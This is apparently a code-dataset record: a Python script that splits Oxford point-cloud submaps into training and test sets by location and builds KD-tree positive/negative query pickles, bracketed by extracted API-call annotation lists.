point')\n", (38201, 38250), False, 'import logging\n'), ((40150, 40163), 'shapely.geometry.Polygon', 'Polygon', (['line'], {}), '(line)\n', (40157, 40163), False, 'from shapely.geometry import Polygon\n'), ((41817, 41830), 'shapely.geometry.Point', 'shPoint', (['x', 'y'], {}), '(x, y)\n', (41824, 41830), True, 'from shapely.geometry import Point as shPoint\n'), ((43174, 43193), 'shapely.geometry.Polygon', 'Polygon', (['new_coords'], {}), '(new_coords)\n', (43181, 43193), False, 'from shapely.geometry import Polygon\n'), ((43995, 44008), 'shapely.geometry.Point', 'shPoint', (['x', 'y'], {}), '(x, y)\n', (44002, 44008), True, 'from shapely.geometry import Point as shPoint\n'), ((45510, 45529), 'shapely.geometry.Polygon', 'Polygon', (['new_coords'], {}), '(new_coords)\n', (45517, 45529), False, 'from shapely.geometry import Polygon\n'), ((46276, 46313), 'trimesh.visual.material.PBRMaterial', 'trimesh.visual.material.PBRMaterial', ([], {}), '()\n', (46311, 46313), False, 'import trimesh\n'), ((47682, 47733), 'numpy.array', 'np.array', (['[edge_borders[i][0], edge_borders[i][-1]]'], {}), '([edge_borders[i][0], edge_borders[i][-1]])\n', (47690, 47733), True, 'import numpy as np\n'), ((47830, 47881), 'numpy.array', 'np.array', (['[edge_borders[j][-1], edge_borders[j][0]]'], {}), '([edge_borders[j][-1], edge_borders[j][0]])\n', (47838, 47881), True, 'import numpy as np\n'), ((15232, 15251), 'numpy.dot', 'np.dot', (['my_vect', 'lv'], {}), '(my_vect, lv)\n', (15238, 15251), True, 'import numpy as np\n'), ((40937, 40985), 'shapely.ops.snap', 'snap', (['lane_shape', 'incoming_shape', 'snap_threshold'], {}), '(lane_shape, incoming_shape, snap_threshold)\n', (40941, 40985), False, 'from shapely.ops import nearest_points, snap\n'), ((41252, 41300), 'shapely.ops.snap', 'snap', (['lane_shape', 'outgoing_shape', 'snap_threshold'], {}), '(lane_shape, outgoing_shape, snap_threshold)\n', (41256, 41300), False, 'from shapely.ops import nearest_points, snap\n'), ((48118, 48163), 'numpy.linalg.norm', 'np.linalg.norm', (['(edge_border_i - edge_border_j)'], {}), '(edge_border_i - edge_border_j)\n', (48132, 48163), True, 'import numpy as np\n'), ((54956, 55021), 'numpy.ediff1d', 'np.ediff1d', (["ref_lanepoints_coordinates['positions_x']"], {'to_begin': '(0)'}), "(ref_lanepoints_coordinates['positions_x'], to_begin=0)\n", (54966, 55021), True, 'import numpy as np\n'), ((55045, 55110), 'numpy.ediff1d', 'np.ediff1d', (["ref_lanepoints_coordinates['positions_y']"], {'to_begin': '(0)'}), "(ref_lanepoints_coordinates['positions_y'], to_begin=0)\n", (55055, 55110), True, 'import numpy as np\n'), ((56792, 56900), 'numpy.array', 'np.array', (["[evenly_spaced_coordinates['positions_x'][idx], evenly_spaced_coordinates[\n 'positions_y'][idx]]"], {}), "([evenly_spaced_coordinates['positions_x'][idx],\n evenly_spaced_coordinates['positions_y'][idx]])\n", (56800, 56900), True, 'import numpy as np\n'), ((42421, 42448), 'shapely.ops.nearest_points', 'nearest_points', (['p', 'nl_shape'], {}), '(p, nl_shape)\n', (42435, 42448), False, 'from shapely.ops import nearest_points, snap\n'), ((44757, 44784), 'shapely.ops.nearest_points', 'nearest_points', (['p', 'nl_shape'], {}), '(p, nl_shape)\n', (44771, 44784), False, 'from shapely.ops import nearest_points, snap\n')]
|
import os
import pickle
import random
import numpy as np
import pandas as pd
from sklearn.neighbors import KDTree
import config as cfg  # assumed: project config module defining DATASET_FOLDER
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
base_path = cfg.DATASET_FOLDER
runs_folder = "oxford/"
filename = "pointcloud_locations_20m_10overlap.csv"
pointcloud_fols = "/pointcloud_20m_10overlap/"
all_folders = sorted(os.listdir(os.path.join(BASE_DIR,base_path,runs_folder)))
folders = []
# All runs except the last are used for training (both full and partial)
index_list = range(len(all_folders)-1)
print("Number of runs: "+str(len(index_list)))
for index in index_list:
folders.append(all_folders[index])
print(folders)
#####For training and test data split#####
x_width = 150
y_width = 150
p1 = [5735712.768124,620084.402381]
p2 = [5735611.299219,620540.270327]
p3 = [5735237.358209,620543.094379]
p4 = [5734749.303802,619932.693364]
p = [p1,p2,p3,p4]
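# Each point above is the centre of a 2*x_width by 2*y_width rectangle
# (300 x 300 in the dataset's metric units); submaps falling inside any
# of these rectangles are held out as test data.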
def check_in_test_set(northing, easting, points, x_width, y_width):
in_test_set = False
for point in points:
        if point[0]-x_width < northing < point[0]+x_width and point[1]-y_width < easting < point[1]+y_width:
in_test_set = True
break
return in_test_set
##########################################
def construct_query_dict(df_centroids, filename):
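    # Build a KD-tree over (northing, easting): positives are other submaps
    # within radius 10 of the query, negatives are those beyond radius 50
    # (distances in the dataset's metric units).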
tree = KDTree(df_centroids[['northing','easting']])
ind_nn = tree.query_radius(df_centroids[['northing','easting']],r=10)
ind_r = tree.query_radius(df_centroids[['northing','easting']], r=50)
queries = {}
for i in range(len(ind_nn)):
query = df_centroids.iloc[i]["file"]
positives = np.setdiff1d(ind_nn[i],[i]).tolist()
negatives = np.setdiff1d(
df_centroids.index.values.tolist(),ind_r[i]).tolist()
random.shuffle(negatives)
queries[i] = {"query":query,
"positives":positives,"negatives":negatives}
with open(filename, 'wb') as handle:
pickle.dump(queries, handle, protocol=pickle.HIGHEST_PROTOCOL)
print("Done ", filename)
# Initialize pandas DataFrame
df_train = pd.DataFrame(columns=['file','northing','easting'])
df_test = pd.DataFrame(columns=['file','northing','easting'])
for folder in folders:
df_locations = pd.read_csv(os.path.join(
base_path,runs_folder,folder,filename),sep=',')
df_locations['timestamp'] = runs_folder+folder + \
pointcloud_fols+df_locations['timestamp'].astype(str)+'.bin'
df_locations = df_locations.rename(columns={'timestamp':'file'})
for index, row in df_locations.iterrows():
        if check_in_test_set(row['northing'], row['easting'], p, x_width, y_width):
df_test = df_test.append(row, ignore_index=True)
else:
df_train = df_train.append(row, ignore_index=True)
print("Number of training submaps: "+str(len(df_train['file'])))
print("Number of non-disjoint test submaps: "+str(len(df_test['file'])))
construct_query_dict(df_train,"training_queries_baseline.pickle")
construct_query_dict(df_test,"test_queries_baseline.pickle")
|
[
"pandas.DataFrame",
"os.path.abspath",
"pickle.dump",
"os.path.join",
"random.shuffle",
"numpy.setdiff1d",
"sklearn.neighbors.KDTree"
] |
[((2077, 2130), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['file', 'northing', 'easting']"}), "(columns=['file', 'northing', 'easting'])\n", (2089, 2130), True, 'import pandas as pd\n'), ((2139, 2192), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['file', 'northing', 'easting']"}), "(columns=['file', 'northing', 'easting'])\n", (2151, 2192), True, 'import pandas as pd\n'), ((143, 168), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (158, 168), False, 'import os\n'), ((1308, 1353), 'sklearn.neighbors.KDTree', 'KDTree', (["df_centroids[['northing', 'easting']]"], {}), "(df_centroids[['northing', 'easting']])\n", (1314, 1353), False, 'from sklearn.neighbors import KDTree\n'), ((358, 404), 'os.path.join', 'os.path.join', (['BASE_DIR', 'base_path', 'runs_folder'], {}), '(BASE_DIR, base_path, runs_folder)\n', (370, 404), False, 'import os\n'), ((1761, 1786), 'random.shuffle', 'random.shuffle', (['negatives'], {}), '(negatives)\n', (1775, 1786), False, 'import random\n'), ((1941, 2003), 'pickle.dump', 'pickle.dump', (['queries', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(queries, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (1952, 2003), False, 'import pickle\n'), ((2246, 2300), 'os.path.join', 'os.path.join', (['base_path', 'runs_folder', 'folder', 'filename'], {}), '(base_path, runs_folder, folder, filename)\n', (2258, 2300), False, 'import os\n'), ((1616, 1644), 'numpy.setdiff1d', 'np.setdiff1d', (['ind_nn[i]', '[i]'], {}), '(ind_nn[i], [i])\n', (1628, 1644), True, 'import numpy as np\n')]
|